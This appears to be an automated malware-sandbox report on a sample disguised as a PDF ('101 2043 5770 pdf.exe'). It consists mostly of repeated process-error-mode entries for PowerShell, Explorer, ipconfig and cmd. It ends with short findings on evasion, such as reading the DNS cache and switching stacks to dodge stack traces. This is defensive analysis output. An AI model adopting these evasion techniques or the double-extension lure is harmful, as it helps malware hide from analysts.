Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Reads the DNS cache

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE3872 DnsGetCacheDataTableEx,DnsFree,DnsFree,

9_2_00DE3872

Switches to a custom stack to bypass stack traces

